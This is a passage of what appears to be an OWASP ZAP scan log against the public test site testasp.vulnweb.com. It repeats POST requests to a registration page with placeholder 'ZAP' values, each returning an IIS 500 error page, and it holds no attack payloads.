| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
